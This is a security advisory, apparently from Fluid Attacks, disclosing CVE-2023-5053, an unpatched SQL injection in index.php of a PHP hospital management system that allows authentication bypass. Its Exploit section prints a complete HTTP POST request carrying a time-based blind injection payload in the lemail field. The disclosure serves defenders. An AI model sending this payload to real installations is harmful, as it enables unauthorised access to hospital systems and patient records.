---
slug: advisories/shierro/
title: SQL Injection in hospital-management-system-in-php 378c157 in index.php
authors: Carlos Bello
writer: cbello
codename: shierro
product: SQL Injection in hospital-management-system-in-php 378c157 in index.php
date: 2023-09-28 12:00 COT
cveid: CVE-2023-5053
severity: 8.8
description: SQL Injection in hospital-management-system-in-php 378c157 in index.php
keywords: Fluid Attacks, Security, Vulnerabilities, SQLI, Hospital Managment System, CVE
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="SQL Injection in hospital-management-system-in-php 378c157 in index.php"
    code="[Shierro](https://www.last.fm/music/Shierro)"
    product="Hospital Management System"
    affected-versions="Version 378c157"
    fixed-versions=""
    state="Public"
    release="2023-09-28">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="SQL injection"
    rule="[146. SQL injection](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-146)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
    score="8.8"
    available="Yes"
    id="[CVE-2023-5053](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5053)">
</vulnerability-table>

## Description

Hospital management system version 378c157 allows to bypass authentication.
This is possible because the application is vulnerable to SQLI.

## Vulnerability

A sql injection (SQLI) vulnerability has been identified in
Hospital management system. This allows bypassing authentication
and access as any user.

## Exploit

```txt
POST /hospital-management-system-php-mysql-master/index.php HTTP/1.1
Host: vulnerable.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Connection: close
Cookie: PHPSESSID=p77e9snm8g836b5lar3qb6l8ahj

lemail=test2@test.com'%2b(select*from(select(sleep(20)))a)%2b'&lpassword=1234
```

## Evidence of exploitation

![sqlmap](https://user-images.githubusercontent.com/51862990/268680993-2d8b3714-48bc-4373-9bda-b21daaf9a7a4.png)

## Our security policy

We have reserved the ID CVE-2023-5053 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: hospital-management-system-in-php 378c157

* Operating System: GNU/Linux

## Mitigation

There is currently no patch available for this vulnerability.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://github.com/projectworldsofficial/hospital-management-system-in-php/>

## Timeline

<time-lapse
  discovered="2023-09-15"
  contacted="2023-09-15"
  replied=""
  confirmed=""
  patched=""
  disclosure="2023-09-28">
</time-lapse>
